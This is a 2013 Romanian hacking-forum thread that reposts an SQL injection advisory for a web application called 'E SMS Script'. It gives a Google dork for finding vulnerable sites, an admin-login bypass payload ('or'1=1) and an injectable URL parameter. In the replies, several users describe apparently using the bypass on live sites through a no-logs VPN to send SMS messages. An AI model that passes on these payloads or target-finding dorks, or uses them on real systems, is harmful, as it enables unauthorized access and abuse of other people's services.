boogy Posted January 8, 2013 Report Posted January 8, 2013 # E SMS Script Multiple SQL Injection Vulnerability# By cr4wl3r http://bastardlabs.info# http://bastardlabs.info/exploits/E_SMS_Script.txt# Good Music: http://goo.gl/TLkEs # Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41# Dork: inurl:"smscollection.php?cat_id="Proof of concept:Auth Bypasshttp://bastardlabs/admin/adminlogin.phpUsername: cr4wl3rPassword: 'or'1=1Blind SQLihttp://bastardlabs/smscollection.php?cat_id=[Blind SQLi]References:http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41SourceE SMS Script SQL Injection - CXSecurity WLB 1 Quote
afumat Posted January 8, 2013 Report Posted January 8, 2013 pf... ce sms bomber fac eu... MERCI Quote
eusimplu Posted January 8, 2013 Report Posted January 8, 2013 (edited) SI chiar cand nu sunt pe windows sa automatizez in AutoIt, ce aiurea. Dar tot ma uit din curiozitate pe acolo.Si nu am nici un nologin , ce ma tenteaza sa intru fara acolo Edited January 8, 2013 by eusimplu Quote
pedala1 Posted January 8, 2013 Report Posted January 8, 2013 l`ati probat? mie nu`mi ajunge sms-uledit: Cred ca e valabil doar in India Quote
afumat Posted January 8, 2013 Report Posted January 8, 2013 am intrat cu vpn no-logs si nu este doar pentru india... mie mi-a ajuns (Sunt pe Vodafone) Quote
